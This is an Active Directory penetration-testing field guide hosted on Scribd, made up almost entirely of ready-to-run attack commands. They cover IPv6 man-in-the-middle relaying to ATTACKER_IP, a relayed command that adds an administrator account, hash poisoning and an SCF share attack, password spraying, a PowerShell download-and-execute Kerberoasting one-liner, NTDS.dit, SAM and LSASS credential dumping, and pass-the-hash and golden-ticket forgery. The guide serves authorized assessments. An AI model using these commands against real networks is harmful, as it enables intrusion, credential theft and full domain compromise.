Scribd
Upload
96 views58 pages

Active Directory Pentesting Guide

This document provides an overview of reconnaissance techniques for discovering assets, users, and credentials on a Windows network. It describes unauthenticated methods like port scanning and NULL sessions, as well as authenticated techniques using tools like BloodHound, CrackMapExec, and ldapdomaindump to dump information from Active Directory like computers, users, groups and their membership. Hashes and plain text credentials can then be extracted from Active Directory databases or cached on systems.

Uploaded by

ehlaban
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
96 views58 pages

Active Directory Pentesting Guide

This document provides an overview of reconnaissance techniques for discovering assets, users, and credentials on a Windows network. It describes unauthenticated methods like port scanning and NULL sessions, as well as authenticated techniques using tools like BloodHound, CrackMapExec, and ldapdomaindump to dump information from Active Directory like computers, users, groups and their membership. Hashes and plain text credentials can then be extracted from Active Directory databases or cached on systems.

Uploaded by

ehlaban
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd

Table of Contents

RECONNAISSANCE ...................................................................................... 3
IPV4 NETWORK ACCESS CONTROL (NAC) BYPASS ................................................................ 4
UNAUTHENTICATED A SSET DISCOVERY .................................................................................. 5
UNAUTHENTICATED U SER DISCOVERY ................................................................................... 6
A UTHENTICATED ASSET /USERNAME DISCOVERY ...................................................................... 8
PORT DISCOVERY .......................................................................................................... 10
VULNERABILITY IDENTIFICATION ................................................................. 12
VULNERABILITY SCANNERS ............................................................................................... 13
INITIAL FOOTHOLD .................................................................................... 14
DEFAULT CREDENTIALS .................................................................................................... 15
ACQUIRE CREDENTIALS ................................................................................................... 16
CRACKING HASHES ................................................................................... 21
WORDLISTS AND RULES AND MASKS ................................................................................... 22
WINDOWS VERTICAL PRIVILEGE ESCALATION ............................................. 24
REMOTE USER TO ADMIN ................................................................................................. 25
WINDOWS HORIZONTAL PRIVILEGE ESCALATION ........................................ 27
LOGGED IN U SERS ......................................................................................................... 28
REMOTE MIMIKATZ /LSA DUMPS FROM LOCAL ADMIN ........................................................... 28
PASS T HE HASH (PTH) .................................................................................................... 29
PASS T HE K EY (PTK) ....................................................................................................... 30
PASS T HE TICKET (PTT) .................................................................................................... 32
S ILVER T ICKET ................................................................................................................ 33
GOLDEN T ICKET ............................................................................................................. 35
A UTOMATE L OCAL ADMIN T O DOMAIN ADMIN (NOISY) ....................................................... 37
CREDENTIAL PILLAGING ............................................................................ 38
E XTRACT SAM & CACHED HASHES MANUALLY .................................................................... 39
E XTRACT NTDS. DIT HASHES MANUALLY .............................................................................. 39
E XTRACT NTDS. DIT HASHES (AUTOMATED ) ......................................................................... 39
F IND P LAINTEXT PASSWORDS ............................................................................................ 40
WPA PSK STRING E XTRACTION ........................................................................................ 42
WIRELESS .................................................................................................. 44
WPA/WPA2 HASH CAPTURE WITH U SERS ........................................................................... 45
WPA/WPA2 HASH CAPTURE WITHOUT U SERS (PMKID) ........................................................ 45
WPS ........................................................................................................................... 46
ENTERPRISE W IRELESS ...................................................................................................... 46
EVIL TWIN (SOCIAL ENGINEERING ) .................................................................................... 47
OPEN WIRELESS ............................................................................................................. 47
WEP WIRELESS .............................................................................................................. 47
METHODOLOGY ........................................................................................ 49

Internal Security Assessment: Field Guide Page 1


INTERNAL RUN BOOK FOR MOST W INDOWS NETWORKS (QUICK ACCESS) ................................. 50

Internal Security Assessment: Field Guide Page 2


RECONNAISSANCE

Internal Security Assessment: Field Guide Page 3


IP V 4 N ETWORK A CCESS C ONTROL (NAC) B YPASS

Bypass IPv4 with IPv6


#Most defensive tools exclusively look at IPv4 addresses. Forcing traffic over IPv6 yields a high chance
you will go undetected and be unchallenged.
#Use Metasploit to scan to determine if IPv6 is in use.

auxiliary/scanner/discovery/ipv6_multicast_ping

auxiliary/scanner/discovery/ipv6_neighbor

auxiliary/scanner/discovery/ipv6_neighbor_router_advertisement

SMB server
#Launch a man in the middle attack over IPv6 to SMB share.
[Link]
[Link]

mitm6 -i eth0

[Link] SMB_SHARE_NAME path/to/share

Responder
#Launch a man in the middle attack over IPv6.
[Link]
[Link]

mitm6 -i eth0

responder -I eth0 -wFv

ntlmrelayx
#Launch a man in the middle attack over IPv6.
[Link]
[Link]

mitm6 -hw icorp-w10 -d [Link] --ignore-nofqnd

Internal Security Assessment: Field Guide Page 4


[Link] -t ldaps://[Link] -wh attacker-wpad --delegate-access

[Link] -wh ATTACKER_IP -t smb://TARGET_IP/ -i

OR

[Link] -ip [Link] -t rpc://[Link] -c "net user xyzuser xyzpass /add && net localgroup
Administrators xyzuser /add"

U NAUTHENTICATED A SSET D ISCOVERY


#Various techniques to enumerate hosts and services
Private IPv4 Networks

[Link]/8

[Link]/12

[Link]/16

ARP Scan

netdiscover -i eth0

NetBIOS Scan

nbtscan <CIDR>

Limited Port Scan

nmap -sS –p 445,22,80 <CIDR>/12--max-os-tries 1 --max-retries 3 --min-rtt-timeout 100ms --initial-rtt-


timeout 500ms --defeat-rst-ratelimit --min-rate 450 --max-rate 15000 --open

Ping Scan

nmap -sP <CIDR>

Internal Security Assessment: Field Guide Page 5


Mass Scan

masscan <CIDR>‐‐top-ports 100

DNS/DC Enumeration

fierce -dns [Link]

OR

nmap --script dns-brute [Link]

U NAUTHENTICATED U SER D ISCOVERY

NULL Session
[Link]

[Link]

Crackmapexec smb [Link] -u “” -p “” –users

OR

smbclient -N -U "" -L \\[Link]

OR

rpcclient -N -U "" -L \\[Link]

rpcclient $> enumdomusers

OR

[Link] [Link] 500 50000 | tee -a [Link]

Anonymous Enumeration of AD

ldapsearch -LLL -x -H ldap://[Link] -b'' -s base '(objectclass=\*)'

Internal Security Assessment: Field Guide Page 6


Username Enumeration
# Bruteforce and enumerate valid Active Directory accounts through Kerberos Pre-Authentication.

nmap -p 88 --script=krb5-enum-users --script-args krb5-enum-


[Link]='[Link]',userdb=[Link] [Link]

Internal Security Assessment: Field Guide Page 7


A UTHENTICATED A SSET /U SERNAME D ISCOVERY

Basic User and Host Dump of AD Computers


[Link]

ldapdomaindump -u DOMAIN\\notanadmin -p QWERTY <target>

Dump Active Directory Subnet


[Link]
[Link]

1) [Link] --healthcheck --server <DOMAIN_CONTROLLER_IP> --user <USERNAME> --


password <PASSWORD>

2) [Link] --hc-conso

OR

.\[Link] -username=testuser -password="testpass!" -domain="[Link]" -


dc="[Link]" -unsafe

AD Dump
[Link]

bloodhound-python -u <USERNAME> -p <PASSWORD> -c all

#Computers

cat [Link]|jq -r '.computers[] | .Properties |.name'

#Users

cat [Link]|jq -r '.users[] | .Properties |.name'

#Admins

cat [Link]|jq -r '.users[] | .Properties |select(.admincount==true) |.name'

[Link]

Internal Security Assessment: Field Guide Page 8


crackmapexec ldap [Link] -u USERNAME -p PASSWORD --admin-count

Computer Asset Dump


apt install ldap-utils

ldapsearch -LLL -H ldap://[Link] -x -D 'OURDOMAIN\user' -w 'thepassword' -b


'dc=ourdomain,dc=local' 'objectClass=computer' name

Local User Dump


[Link]

crackmapexec smb [Link]/24 -u USERNAME -p 'PASSWORD' --users

Basic User DNS Dump


[Link]

adidnsdump -u DOMAIN\\notanadmin <target>

Domain Admins Locator


[Link]

Get-SPN -type group -search "Domain Admins" -List yes -DomainController <target>00 -Credential
domainuser | Format-Table –Autosize

Dump Global Address List


[Link]

Get-GlobalAddressList -ExchHostname [Link] -Username notanadmin@[Link]


-Password Password123

Internal Security Assessment: Field Guide Page 9


Dump Active Directory Usernames
[Link]

Get-ADUsernameFromEWS -Emaillist .\[Link]

P ORT D ISCOVERY

Rapid TCP Port Scan


#Scan for the most common ports of interest. Helpful for quick results on a large scope.

nmap -iL [Link] --excludefile [Link] --privileged -n -PE -PS21-23,25,53,80,110-


111,135,139,143,443,445,993,995,1723,3306,3389,5900,8080 --osscan-guess --max-os-tries 1 --max-
retries 3 --min-rtt-timeout 100ms --initial-rtt-timeout 500ms --defeat-rst-ratelimit --min-rate 450 --max-
rate 15000 --open --stats-every 10s -oX /tmp/[Link]

OR

masscan -iL [Link] ‐‐top-ports 100 -oX /tmp/[Link]

Default TCP Port Scan


#Scan for the most common/default ports. Slower results on a large scope.

nmap -iL [Link] --excludefile [Link] --osscan-guess --max-os-tries 1 --max-retries 3 --min-rtt-


timeout 100ms --initial-rtt-timeout 500ms --defeat-rst-ratelimit --min-rate 450 --max-rate 15000 --open -
-stats-every 10s -oX /tmp/[Link]

Rapid TCP/UDP Port Scan


#Scan for the most common ports of interest. Helpful for quick results on a large scope.

nmap -iL [Link] --excludefile [Link] --privileged -n -PE -PS21-23,25,53,80,110-


111,135,139,143,443,445,993,995,1723,3306,3389,5900,8080 -PU53,67-69,123,135,137-139,161-
162,445,500,514,520,631,1434,1900,4500,5353,49152 --osscan-guess --max-os-tries 1 --max-retries 3 --
min-rtt-timeout 100ms --initial-rtt-timeout 500ms --defeat-rst-ratelimit --min-rate 450 --max-rate 15000
--open --stats-every 10s -oX /tmp/[Link]

Internal Security Assessment: Field Guide Page 10


Extensive TCP Port Scan
#Scan for the most common ports of interest. Very slow on a large scope.

nmap -iL [Link] –p- --excludefile [Link] --osscan-guess --max-os-tries 1 --max-retries 3 --min-
rtt-timeout 100ms --initial-rtt-timeout 500ms --defeat-rst-ratelimit --min-rate 450 --max-rate 15000 --
open --stats-every 10s -oX /tmp/[Link]

Internal Security Assessment: Field Guide Page 11


VULNERABILITY IDENTIFICATION

Internal Security Assessment: Field Guide Page 12


V ULNERABILITY S CANNERS
Invest in a decent vulnerability scanner for internal assessments. This can help automate identification of
low hanging fruit.

Paid Scanning Tools Function

Tenable Nessus Infrastructure Vulnerability Scanner, Light


Application Analysis

Rapid7 Nexpose Infrastructure Vulnerability Scanner, Light


Application Analysis

Saint Infrastructure Vulnerability Scanner, Light


Application Analysis

BurpSuite Heavy, Manual Web Application Analysis

Acunetix Automated Web Application Analysis

Netsparker Automated Web Application Analysis

Free Scanning Tools Function

OpenVAS Infrastructure Vulnerability Scanner, Light


Application Analysis

Wapiti Web Application Analysis only

NMAP Scripts Infrastructure Vulnerability Scanner, Light


Application Analysis

Metasploit Auxiliary Modules Infrastructure Vulnerability Scanner, Light


Application Analysis

Nuclei Crowdsourced Infrastructure Vulnerability


Scanner, Application Analysis

Internal Security Assessment: Field Guide Page 13


INITIAL FOOTHOLD

Internal Security Assessment: Field Guide Page 14


D EFAULT C REDENTIALS
#All of the tools below help to look for default credential usage. No one tool will find all the default
credentials.
NMAP Default Creds

nmap --script http-default-accounts -p


80,81,280,591,593,832,981,1311,2480,4444,4445,4567,5000,5104,5800,7000,7001,7002,8008,8042,808
8,8222,8243,8280,8281,8333,8530,8531,8887,8888,9080,9981,12443,12043,12046,16080,18091,18092,
8080,443,8443,8081,9090,9091,8000,10443,22,21,23 –iL [Link] –oX /tmp/nmap_output.xml

Nuclei Cred Scan


#HTTP credential scanner.
[Link]

nuclei -l [Link] -t /root/nuclei-templates/default-logins

Changeme Cred Scan


#HTTP scanner by default, has support for SSH, SSH keys, and SNMP.
[Link]

[Link] nmap_output.xml

Manual Login Identification


[Link]

cat [Link] | httpx –threads 500 -ms "assword"

EyeWitness Active Cred Scan


#HTTP credential scanner.
[Link]

Internal Security Assessment: Field Guide Page 15


Eyewitness -x default_creds.xml --active-scan --web

BruteSpray Cred Scan


#Imports an nmap XML file, and scans for the below supported services.
• ssh, ftp, telnet, vnc, mssql, mysql, postgresql, rsh, imap, nntp, pcanywhere, pop3, rexec, rlogin,
smbnt, smtp, svn, vmauthd, snmp
[Link]

python [Link] --file nmap_output.xml --threads 5 --hosts 5

Brutex Cred Scan


#Automatically brute force all logins running on a target.
[Link]

brutex <target>

Metasploit Cred Scans


#Miscellaneous scanner modules for specific services and goals.

use auxiliary/scanner/*

A CQUIRE C REDENTIALS

AD CS Abuse
[Link]

[Link]

python3 [Link] <attacking machine’s IP> <target Domain Controller’s IP>

cat base64 | base64 -d > [Link]

python3 [Link] [Link]/DC01NAME\$ -cert-pfx [Link] [Link]

Internal Security Assessment: Field Guide Page 16


KRB5CCNAME=[Link] python3 [Link] [Link]/DC01\$ -key e19fd...blah

crackmapexec ldap [Link] -u DC01\$ -H 6e02...truncated --admin-count

KRB5CCNAME=[Link] python3 [Link]


kerberos+ccache://[Link]\\DC01\$:[Link]@[Link]
cifs/[Link]@[Link] Administrator@[Link] [Link] -v

Export KRB5CCNAME=’/path/to/[Link]’

[Link] [Link]/Administrator@[Link] -k -no-pass

SMB relay/IPv6 DNS poison


[Link]
[Link]

crackmapexec smb [Link]/24 --gen-relay-list [Link]

mitm6 -i eth0 -d [Link]

[Link] -6 -wh $attacker_ip -of loot -tf [Link] -smb2support

Mitm6, ntlmrelayx and RBCD


[Link]
[Link]

mitm6 -hw icorp-w10 -d [Link] --ignore-nofqnd

[Link] -t ldaps://[Link] -wh attacker-wpad --delegate-access

[Link] -spn cifs/[Link] [Link]/NEW_PC_NAME\$ - impersonate admin

export KRB5CCNAME=[Link]

[Link] -k -no-pass [Link]

SCF Upload
#SMB Share File attack.

Internal Security Assessment: Field Guide Page 17


Create an SCF file with the following:

[Shell] Command=2 IconFile=\\<attacker IP>\share\[Link]

[Taskbar] Command=ToggleDesktop

Upload to the share.

responder -I eth0 -v

LLMNR/NBTNS/mDNS poisoning – Capture Hashes

responder -I eth0 –rPv

Find Hosts with SMB Signing Disabled

crackmapexec smb <CIDR> --gen-relay-list [Link]

LLMNR/NBTNS/mDNS poisoning – Relay Hashes


#Configure Responder to redirect user auth. In [Link], set SMB,HTTP and HTTPS to OFF in
the list of servers to start, then:

responder -I eth0 –v

[Link] -tf [Link]

Devices with LDAP enabled


Finding printers
[Link]
[Link]
Manual Exploit

Search for default credentials on printers with LDAP enabled

netcat -l -vv -p 444

Internal Security Assessment: Field Guide Page 18


Initiate an LDAP query.

Seth MiTM RDP Connections


[Link]

[Link] <INTERFACE> <ATTACKER IP> <VICTIM IP> <GATEWAY IP|HOST IP>

Resource-based Constrained Delegation


[Link]

mitm6 -i eth0-d <domain>

[Link] -t ldaps://<DomainController> -wh attacker-wpad --delegate-access

export KRB5CCNAME=<TGS_ccache_file>

[Link] –k –no-pass <VictimPC>

Password Spray
Collect usernames from the internet.
o Theharvester - [Link]
o Linkedint - [Link]
o Raven - [Link]
o [Link]
o [Link] - $4.49 purchase required
o Scylla - [Link]
o Authenticated Asset/Username Discovery Section
[Link]

[Link] -smb <targetIP> <usernameList> <passwordList> <AttemptsPerLockoutPeriod>


<LockoutPeriodInMinutes> <DOMAIN>

Crackmapexec

crackmapexec <protocol> <target(s)> -u username1 -p password1 password2

crackmapexec <protocol> <target(s)> -u username1 username2 -p password1

Internal Security Assessment: Field Guide Page 19


crackmapexec <protocol> <target(s)> -u ~/file_containing_usernames -p ~/file_containing_passwords

crackmapexec <protocol> <target(s)> -u ~/file_containing_usernames -H ~/file_containing_ntlm_hashes

[Link]
#For MS Cloud services only

[Link]

Internal Security Assessment: Field Guide Page 20


CRACKING HASHES

Internal Security Assessment: Field Guide Page 21


W ORDLISTS AND R ULES AND M ASKS

Wordlists
• [Link]
• [Link]
• [Link]
• [Link]

Create Company Specific Wordlist


#Businesses often share a common password related to the business.
[Link]

cewl -d 3 -m 4 -w /tmp/[Link] [Link]

#Businesses often share a common password related to the business.


[Link]

Usage:

1. Point Burp Suite to Jython in the Extender > Options tab.

2. Install this extension manually in the Extender > Extensions tab.

3. Select an option for extension output (File, Console or UI).

4. Right-click on any element in the Target tab's hierarchical sitemap.

5. Select the Extensions > Create wordlist context menu item.

Common Hashes to Crack (Hashcat)


900 | MD4
0 | MD5
3000 | LM
1000 | NTLM
1100 | Domain Cached Credentials (DCC), MS Cache
2100 | Domain Cached Credentials 2 (DCC2), MS Cache 2

Internal Security Assessment: Field Guide Page 22


5500 | NetNTLMv1
5600 | NetNTLMv2
2500 | WPA/WPA2
13100 | Kerberos 5 TGS-REP etype 23 (Kerberoast)
18200| Kerberos 5 AS-REP etype 23 (ASREPRoast)

Convert MScach2 from crackmapexec to Hashcat Format

cat /root/.cme/logs/*.cached |cut -d : -f2- > mscach2_hashes.txt

Wordlist/No rules

hashcat -m 5600 -O -w 3 admin_hash.txt fav_wordlist.txt

Wordlist W/rules

hashcat -m 5600 -O -w 3 admin_hash.txt fav_wordlist.txt -r /usr/share/hashcat/rules/[Link]

Bruteforce No Special Char

hashcat -m 5600 -O -w 3 admin_hash.txt -a3

Crack IPMI

hashcat --username -m 7300 -O -w 3 admin_hash.txt fav_wordlist.txt -r


/usr/share/hashcat/rules/[Link]

Combination Attack

hashcat -m 0 -a 1 [Link] [Link] [Link]

Internal Security Assessment: Field Guide Page 23


WINDOWS VERTICAL PRIVILEGE
ESCALATION

Internal Security Assessment: Field Guide Page 24


R EMOTE U SER TO A DMIN

AD CS Abuse
Certipy

certipy 'example/john:Passw0rd@[Link]' auto

ASREPRoast
Crackmapexec

crackmapexec ldap <Domain Controller> -u [Link] -p '' --asreproast [Link]

crackmapexec ldap <Domain Controller> -u username -p pass --asreproast [Link]

Kerberoast
[Link] (Linux)

[Link] –request [Link]/notanadmin

crackmapexec ldap <Domain Controller> -u username -p pass --kerberoasting [Link]

[Link] (Windows)

.\[Link] kerberoast /outfile:

PowerShell

$webreq =
[[Link]]::Create(‘[Link]
a/module_source/credentials/Invoke-Kerberoast.ps1’); $resp=$[Link]();
$respstream=$[Link](); $reader=[[Link]]::new($respstream);
$content=$[Link](); IEX($content); Invoke-Kerberoast -OutputFormat HashCat|Select-
Object -ExpandProperty hash | out-file -Encoding ASCII [Link]

Extract GPP Credentials

Internal Security Assessment: Field Guide Page 25


[Link]

crackmapexec smb DC_IP_ADDR –u notanadmin –p Password123 –d domain –M gpp_password

MS Exchange – Domain Escalation


[Link]

[Link] -t ldap://[Link] --escalate-user notanadmin

python [Link] -ah [Link] [Link] -u notanadmin -d


[Link]

[Link] [Link]/notanadmin@[Link] –just-dc

Escalate via MSSQL

1) crackmapexec mssql [Link] -u username -p password –local-auth -M mssql_priv

2) crackmapexec mssql [Link] -u username -p password –local-auth -M mssql_priv -o “ACTION-


privexec”

3) crackmapexec mssql [Link] -u username -p password –local-auth -x whoami

4) crackmapexec mssql [Link] -u username -p password –local-auth -o “ACTION-rollback”

Active Directory Low Hanging Fruit Check


[Link]

[Link] –healthcheck –server <DOMAIN_CONTROLLER_IP> --user <USERNAME> --


password <PASSWORD>

Internal Security Assessment: Field Guide Page 26


WINDOWS HORIZONTAL PRIVILEGE
ESCALATION

Internal Security Assessment: Field Guide Page 27


L OGGED I N U SERS

Crackmapexec

crackmapexec smb [Link]/24 -u username -p Password123 –d domain --loggedon-users

Metasploit

use auxiliary/scanner/smb/psexec_loggedin_users

Set: RHOSTS, SMBUser, SMBPass, SMBDomain, run

Pingcastle

[Link] --graph --server <DOMAIN_CONTROLLER_IP> --user <USERNAME> --password


<PASSWORD>

Bloodhound
[Link]

neo4j start

python [Link] -u <USERNAME> -p <PASSWORD> -d <DOMAIN_NAME> -dc


<DOMAIN_CONTROLLER_HOSTNAME>

Bloodhound Python
[Link]

python3 [Link] -d <domain> -u username -p password -c All

Bloodhound – LSASSY

crackmapexec smb [Link]/24 -d [Link] -u Administrator -p Passw0rd -M lsassy -o


BLOODHOUND=True NEO4JPASS=bloodhound

R EMOTE M IMIKATZ /LSA D UMPS F ROM L OCAL A DMIN

Dump LSA secrets

Internal Security Assessment: Field Guide Page 28


Crackmapexec
[Link]

crackmapexec smb [Link] -u localadmin -p Password123 –d domain --lsa

Metasploit

use auxiliary/scanner/smb/impacket/secretsdump

Set: RHOSTS, SMBUser, SMBPass, SMBDomain, run

LSASSY

crackmapexec smb <target> -u administrator -p pass -M lsassy

Dump with Mimikatz


Crackmapexec

crackmapexec smb <target> -u admin -p Password123 -M mimikatz

Metasploit

exploit/windows/smb/psexec_psh

load kiwi

creds_all

Set: RHOSTS, SMBUser, SMBPass, SMBDomain, run

CredCrack
[Link]

[Link] -f [Link] -d domain -u localadmin -l <target>

P ASS T HE H ASH (PTH)

Internal Security Assessment: Field Guide Page 29


Dump SAM file (1)
Crackmapexec

crackmapexec smb [Link] -u localadmin -p Password123 –d domain –sam

Metasploit

use exploit/windows/smb/psexec > load kiwi > creds_all

Set: RHOST, SMBUser, SMBPass, SMBdomain, run

Pass the Hash (2)


Crackmapexec

crackmapexec smb [Link] -u localadmin -H 8846F7EAEE8FB117AD06BDD830B7586C --local-


auth

Metasploit

use exploit/windows/smb/psexec

Set: RHOST, SMBUser, SMBPass LM:NTLM, run

xfreerdp

xfreerdp /u:administrator /d:[Link] /pth:7337532fd3bf3abfaef5a9b5bb05a9d8 /v:[Link]


/size:800x600

P ASS T HE K EY (PTK)

Request The TGT via Linux (1)


Impacket
[Link]
#Request the TGT with hash

Internal Security Assessment: Field Guide Page 30


python [Link] <domain_name>/<user_name> -hashes [lm_hash]:<ntlm_hash>

OR

#Request the TGT with aesKey

python [Link] <domain_name>/<user_name> -aesKey <aes_key>

OR

#Request the TGT with password

python [Link] <domain_name>/<user_name>:[password]

Pop Shell via Linux (2)


#Set the TGT from Impacket

export KRB5CCNAME=<TGS_ccache_file>

#Execute remote commands with psexec or smbexec or wmiexec

python [Link] <domain_name>/<user_name>@<remote_hostname> -k -no-pass

OR

python [Link] <domain_name>/<user_name>@<remote_hostname> -k -no-pass

OR

python [Link] <domain_name>/<user_name>@<remote_hostname> -k -no-pass

Request The TGT via Windows (1)


[Link]
#Request the TGT with hash

.\[Link] asktgt /domain:<domain_name> /user:<user_name> /rc4:<ntlm_hash> /ptt

Pop Shell via Windows (2)

Internal Security Assessment: Field Guide Page 31


#Execute a cmd on the remote machine

.\[Link] -accepteula \\<remote_hostname> cmd

P ASS T HE T ICKET (PTT)


Harvest tickets on Linux host (1)

grep default_ccache_name /etc/[Link]

OR

grep default_ccache_name /tmp/krb5cc_%{uid}

OR

#If user is root Tickey will inject into other user processes. Must be in a reachable folder.

[Link]

cp tickey /tmp/tickey && /tmp/tickey -i

Use Ticket via Linux (2)


#Set the TGT from Impacket

export KRB5CCNAME=<TGS_ccache_file>

#Execute remote commands with psexec or smbexec or wmiexec

python [Link] <domain_name>/<user_name>@<remote_hostname> -k -no-pass

OR

python [Link] <domain_name>/<user_name>@<remote_hostname> -k -no-pass

OR

python [Link] <domain_name>/<user_name>@<remote_hostname> -k -no-pass

Internal Security Assessment: Field Guide Page 32


Harvest tickets from Windows (1)
Mimikatz
[Link]

mimikatz # sekurlsa::tickets /export

Rubeus in PowerShell
[Link]

.\Rubeus dump

Inject Ticket via Windows (2)


Mimikatz

mimikatz # kerberos::ptt <ticket_kirbi_file>

Rubeus

.\[Link] ptt /ticket:<ticket_kirbi_file>

PsExec

.\[Link] -accepteula \\<remote_hostname> cmd

S ILVER T ICKET

Request The TGT via Linux (1)


[Link]
#Generate the TGS with NTLM via impacket

python [Link] -nthash <ntlm_hash> -domain-sid <domain_sid> -domain <domain_name> -spn


<service_spn> <user_name>

#Generate the TGS with AES key via impacket

Internal Security Assessment: Field Guide Page 33


python [Link] -aesKey <aes_key> -domain-sid <domain_sid> -domain <domain_name> -spn
<service_spn> <user_name>

Set Ticket via Linux (2)


#Use the TGT with Impacket

export KRB5CCNAME=<TGS_ccache_file>

#Execute remote commands with psexec or smbexec or wmiexec

python [Link] <domain_name>/<user_name>@<remote_hostname> -k -no-pass

OR

python [Link] <domain_name>/<user_name>@<remote_hostname> -k -no-pass

OR

python [Link] <domain_name>/<user_name>@<remote_hostname> -k -no-pass

Request The TGT via Windows (1)


[Link]
#Generate the TGS with NTLM via Mimikatz

mimikatz # kerberos::golden /domain:<domain_name>/sid:<domain_sid> /rc4:<ntlm_hash>


/user:<user_name> /service:<service_name> /target:<service_machine_hostname>

#Generate the TGS with AES key via Mimikatz

mimikatz # kerberos::golden /domain:<domain_name>/sid:<domain_sid> /aes128:<krbtgt_aes128_key>


/user:<user_name> /service:<service_name> /target:<service_machine_hostname>

OR

mimikatz # kerberos::golden /domain:<domain_name>/sid:<domain_sid> /aes256:<krbtgt_aes256_key>


/user:<user_name> /service:<service_name> /target:<service_machine_hostname>

Set Ticket via Windows (2)


#Use the TGT with Mimikatz

Internal Security Assessment: Field Guide Page 34


mimikatz # kerberos::ptt <ticket_kirbi_file>

#Use the TGT with Rubeus

.\[Link] ptt /ticket:<ticket_kirbi_file>

#Execute remote commands with psexec

.\[Link] -accepteula \\<remote_hostname> cmd

G OLDEN T ICKET
Request The TGT via Linux (1)
[Link]
#Generate the TGS with NTLM via impacket

python [Link] -nthash <krbtgt_ntlm_hash> -domain-sid <domain_sid> -domain <domain_name>


<user_name>

#Generate the TGS with AES key via impacket

python [Link] -aesKey <aes_key> -domain-sid <domain_sid> -domain <domain_name>


<user_name>

Set Ticket via Linux (2)


#Use the TGT with Impacket

export KRB5CCNAME=<TGS_ccache_file>

#Execute remote commands with psexec or smbexec or wmiexec

python [Link] <domain_name>/<user_name>@<remote_hostname> -k -no-pass

OR

python [Link] <domain_name>/<user_name>@<remote_hostname> -k -no-pass

OR

Internal Security Assessment: Field Guide Page 35


python [Link] <domain_name>/<user_name>@<remote_hostname> -k -no-pass

Request The TGT via Windows (1)


[Link]
#Generate the TGS with NTLM via Mimikatz

mimikatz # kerberos::golden /domain:<domain_name>/sid:<domain_sid> /rc4:<krbtgt_ntlm_hash>


/user:<user_name>

#Generate the TGS with AES key via Mimikatz

mimikatz # kerberos::golden /domain:<domain_name>/sid:<domain_sid> /aes128:<krbtgt_aes128_key>


/user:<user_name>

OR

mimikatz # kerberos::golden /domain:<domain_name>/sid:<domain_sid> /aes256:<krbtgt_aes256_key>


/user:<user_name>

Set Ticket via Windows (2)


#Use the TGT with Mimikatz

mimikatz # kerberos::ptt <ticket_kirbi_file>

#Use the TGT with Rubeus

.\[Link] ptt /ticket:<ticket_kirbi_file>

#Execute remote commands with psexec

.\[Link] -accepteula \\<remote_hostname> cmd

Internal Security Assessment: Field Guide Page 36


A UTOMATE L OCAL A DMIN T O D OMAIN A DMIN (N OISY )
Initiate Deathstar
[Link]

python empire --rest --username empireadmin --password Password123

[Link]

[Link]

Execute DeathStar

crackmapexec smb [Link] -u username -p password –d domain -M empire_exec -o


LISTENER=DeathStar

Internal Security Assessment: Field Guide Page 37


CREDENTIAL PILLAGING

Internal Security Assessment: Field Guide Page 38


E XTRACT SAM & C ACHED H ASHES M ANUALLY

Manual Local SAM and Cached Credential Extraction (1)

reg save hklm\sam c:\SAM

reg save hklm\system c:\SYSTEM

reg save hklm\security c:\SECURITY

Reconstruct SAM and Cached Credentials into readable hashes (2)

impacket-secretsdump -sam /root/SAM -security /root/SECURITY -system /root/SYSTEM LOCAL

E XTRACT NTDS. DIT H ASHES M ANUALLY

Manual [Link] Extraction using vssadmin (1)

vssadmin create shadow /for=C:

copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\windows\ntds\[Link] c:\[Link]

copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\windows\system32\SYSTEM
c:\SYSTEM

Manual [Link] Extraction using ntdsutil (1)

ntdsutil "ac in ntds" i "cr fu c:\temp" q q

Reconstruct [Link] into readable hashes (2)

impacket-secretsdump -ntds ./[Link] -system ./SYSTEM LOCAL -outputfile customer

E XTRACT NTDS. DIT H ASHES (A UTOMATED )

Dump [Link] with Crackmapexec

crackmapexec smb <target> -u admin -p Password123 -d domain --ntds

Internal Security Assessment: Field Guide Page 39


E XTRACT U S ERS W ITHOUT P ASSWORD R EQUIREMENT
No Password Required

crackmapexec ldap [Link] -u username -p password --kdcHost DC_IP_ADDR –password-not-


required

F IND P LAINTEXT P ASSWORDS

Automate searching for credentials through email


[Link]

#Searching with non-admin privs

Invoke-SelfSearch -Mailbox notanadmin@[Link]

#Searching with admin privs

Invoke-GlobalMailSearch -ImpersonationAccount notanadmin -ExchHostname exchange

Automate search through SMB and NFS Shares


[Link]

manspider [Link]/24 -f passw -d [Link] -u bob -p Password

[Link]

python3 [Link] smb -t [Link] -u administrator -p Password123 -d [Link]

OR

python3 [Link] smb --target iplist --username administrator --password Password123 --domain
[Link] --overwrite

[Link]

crackmapexec smb [Link] -u 'username' -p 'password' -M spider_plus

Extract session information for PuTTY, WinSCP, FileZilla, SuperPuTTY, and RDP

Internal Security Assessment: Field Guide Page 40


[Link]

Import-Module path\to\SessionGopher.ps1; Invoke-SessionGopher -iL [Link] -u [Link]\admin


-p Password123 –o

Search passwords in commonly-used software


[Link]

Drop [Link] all on victim

Metasploit Post Exploitation

use post/windows/gather/*

Search passwords in files and registry

findstr /si password *.txt

findstr /si password *.xml

dir /s *pass* == *cred* == *vnc* == *.config*

findstr /spin "password" *.*

reg query HKLM /f password /t REG_SZ /s

reg query HKCU /f password /t REG_SZ /s

findstr /si password *.ini

dir /b /s [Link]

reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon" (Windows


Autologin)

Crackmapexec

crackmapexec smb -t 150 <target> -u USER -p Password123 --spider Users --depth 10 --pattern
password

Internal Security Assessment: Field Guide Page 41


Extract passwords from PST File
Non-Password protected File
[Link]

[Link] –D –S –o output –t ea [Link]

findstr /s /i /m “password” *.*

Password Protected PST File


[Link]

java -jar [Link] -a -f "C:\Users\xxx\[Link]" -i -k "login|password" -o TEST01

Stored User Descriptions


#Sometimes there are passwords or keys stored in descriptions

crackmapexec ldap [Link] -u username -p password --kdcHost DC_IP_ADDR -M get-desc-users

OR

ldapdomaindump -u SITTINGDUCK\\notanadmin -p QWERTY dc-ip

Stored Passwords in PowerShell History

cat (Get-PSReadlineOption).HistorySavePath

or

cat (Get-PSReadlineOption).HistorySavePath | sls password

or

cat (Get-PSReadlineOption).HistorySavePath | sls accountpassword

WPA PSK S TRING E XTRACTION


Windows

netsh wlan show profiles

